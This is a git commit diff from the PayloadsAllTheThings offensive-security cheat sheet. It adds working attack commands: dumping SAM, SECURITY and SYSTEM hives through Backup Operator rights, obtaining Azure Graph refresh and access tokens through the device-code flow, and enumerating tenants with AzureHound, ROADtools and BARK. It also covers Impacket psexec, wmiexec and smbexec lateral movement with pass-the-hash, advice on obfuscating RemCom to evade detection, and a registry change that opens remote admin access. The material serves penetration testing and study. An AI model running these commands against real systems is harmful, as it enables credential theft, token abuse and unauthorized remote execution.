mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
SMBExec + Refresh & Access Token Azure
This commit is contained in:
parent
411f2455a9
commit
8442b304c9
Methodology and Resources
@ -2966,6 +2966,9 @@ This groups grants the following privileges :
|
||||
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
|
||||
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
|
||||
```
|
||||
* Retrieve SAM,SECURITY and SYSTEM hives
|
||||
* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
|
||||
* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
|
||||
|
||||
|
||||
### Abusing Active Directory ACLs/ACEs
|
||||
|
@ -3,6 +3,9 @@
|
||||
## Summary
|
||||
|
||||
* [Azure Recon Tools](#azure-recon-tools)
|
||||
* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell)
|
||||
* [Graph API Refresh Token](#graph-api-refresh-token)
|
||||
* [Graph API Access Token](#graph-api-access-token)
|
||||
* [Terminology](#terminology)
|
||||
* [Training](#training)
|
||||
* [Enumeration](#enumeration)
|
||||
@ -60,35 +63,6 @@
|
||||
|
||||
## Azure Recon Tools
|
||||
|
||||
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
|
||||
```powershell
|
||||
pipenv shell
|
||||
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
|
||||
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
|
||||
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
|
||||
roadrecon gather
|
||||
roadrecon gui
|
||||
```
|
||||
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
|
||||
```powershell
|
||||
# session 1 - backend
|
||||
pipenv shell
|
||||
python ssbackend.pyz
|
||||
|
||||
# session 2 - frontend
|
||||
cd C:\Tools\stormspotter\frontend\dist\spa\
|
||||
quasar.cmd serve -p 9091 --history
|
||||
|
||||
# session 3 - collector
|
||||
pipenv shell
|
||||
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
|
||||
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
|
||||
|
||||
# Web access on http://localhost:9091
|
||||
Username: neo4j
|
||||
Password: BloodHound
|
||||
Server: bolt://localhost:7687
|
||||
```
|
||||
* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
|
||||
```powershell
|
||||
# First, retrieve a refresh token (-r) if username/password isn't supported.
|
||||
@ -98,6 +72,8 @@
|
||||
$rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1]
|
||||
|
||||
# Second, launch azurehound collector
|
||||
./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json
|
||||
|
||||
## Connects on your Azure account using the refresh token provided and the tenant of the account
|
||||
## and collects every possible objects in contoso.microsoft.com. Results are stored in json
|
||||
./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"
|
||||
@ -141,13 +117,42 @@
|
||||
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
|
||||
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
|
||||
```
|
||||
* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
|
||||
* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
|
||||
```ps1
|
||||
. .\BARK.ps1
|
||||
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
|
||||
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
|
||||
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
|
||||
```
|
||||
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
|
||||
```powershell
|
||||
pipenv shell
|
||||
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
|
||||
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
|
||||
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
|
||||
roadrecon gather
|
||||
roadrecon gui
|
||||
```
|
||||
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
|
||||
```powershell
|
||||
# session 1 - backend
|
||||
pipenv shell
|
||||
python ssbackend.pyz
|
||||
|
||||
# session 2 - frontend
|
||||
cd C:\Tools\stormspotter\frontend\dist\spa\
|
||||
quasar.cmd serve -p 9091 --history
|
||||
|
||||
# session 3 - collector
|
||||
pipenv shell
|
||||
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
|
||||
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
|
||||
|
||||
# Web access on http://localhost:9091
|
||||
Username: neo4j
|
||||
Password: BloodHound
|
||||
Server: bolt://localhost:7687
|
||||
```
|
||||
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
|
||||
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
|
||||
```powershell
|
||||
@ -208,6 +213,59 @@
|
||||
$ Create-Backdoor, Execute-Backdoor
|
||||
```
|
||||
|
||||
## Authenticating to the Microsoft Graph API in PowerShell
|
||||
|
||||
* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in)
|
||||
|
||||
| Name | GUID |
|
||||
|----------------------------|--------------------------------------|
|
||||
| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 |
|
||||
| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 |
|
||||
| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c |
|
||||
|
||||
|
||||
### Graph API Refresh Token
|
||||
|
||||
Authenticating to the Microsoft Graph API in PowerShell
|
||||
|
||||
```ps1
|
||||
$body = @{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"resource" = "https://graph.microsoft.com" # Microsoft Graph API
|
||||
}
|
||||
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
|
||||
$Headers=@{}
|
||||
$Headers["User-Agent"] = $UserAgent
|
||||
$authResponse = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$authResponse
|
||||
```
|
||||
|
||||
### Graph API Access Token
|
||||
|
||||
This request require getting the Refresh Token.
|
||||
|
||||
```ps1
|
||||
$body=@{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
|
||||
"code" = $authResponse.device_code
|
||||
}
|
||||
$Tokens = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$Tokens
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Terminology
|
||||
|
||||
> Basic Azure AD terminologies
|
||||
|
@ -11,6 +11,7 @@
|
||||
* [Impacket](#impacket)
|
||||
* [PSExec](#psexec)
|
||||
* [WMIExec](#wmiexec)
|
||||
* [SMBExec](#smbexec)
|
||||
|
||||
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
||||
* [Powershell Remoting Protocol](#powershell-remoting-protocol)
|
||||
@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to
|
||||
All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports.
|
||||
The following table summarize the port used by each scripts.
|
||||
|
||||
| Method | Port Used |
|
||||
|-------------|---------------------------------------|
|
||||
| psexec.py | tcp/445 |
|
||||
| smbexec.py | tcp/445 |
|
||||
| atexec.py | tcp/445 |
|
||||
| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) |
|
||||
| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) |
|
||||
| Method | Port Used | Admin Required |
|
||||
|-------------|---------------------------------------|----------------|
|
||||
| psexec.py | tcp/445 | Yes |
|
||||
| smbexec.py | tcp/445 | No |
|
||||
| atexec.py | tcp/445 | No |
|
||||
| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No |
|
||||
| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes |
|
||||
|
||||
* `psexec`: equivalent of Windows PSEXEC using RemComSvc binary.
|
||||
```ps1
|
||||
@ -153,15 +154,23 @@ The following table summarize the port used by each scripts.
|
||||
wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
|
||||
```
|
||||
|
||||
To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:
|
||||
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
|
||||
To prevent RID 500 from being able to WmiExec or PsExec, execute:
|
||||
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`
|
||||
|
||||
|
||||
### PSExec
|
||||
|
||||
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)
|
||||
Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
|
||||
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))
|
||||
|
||||
Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`
|
||||
|
||||
Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.
|
||||
You need to update the pipe name to match "Custom_communication" in the line 163
|
||||
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
|
||||
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).
|
||||
|
||||
|
||||
### WMIExec
|
||||
|
||||
@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti
|
||||
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
|
||||
|
||||
|
||||
### SMBExec
|
||||
|
||||
It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).
|
||||
|
||||
It will create a new service every time we execute a command. It will also generate an Event 7045.
|
||||
|
||||
By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.
|
||||
|
||||
|
||||
## RDP Remote Desktop Protocol
|
||||
|
||||
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
|
||||
@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands;
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Powershell Remoting Protocol
|
||||
|
||||
### Powershell Credentials
|
||||
@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
|
||||
- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
|
||||
- [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
|
||||
- [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf)
|
||||
- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol)
|
||||
- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/)
|
||||
- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/)
|
Loading…
Reference in New Issue
Block a user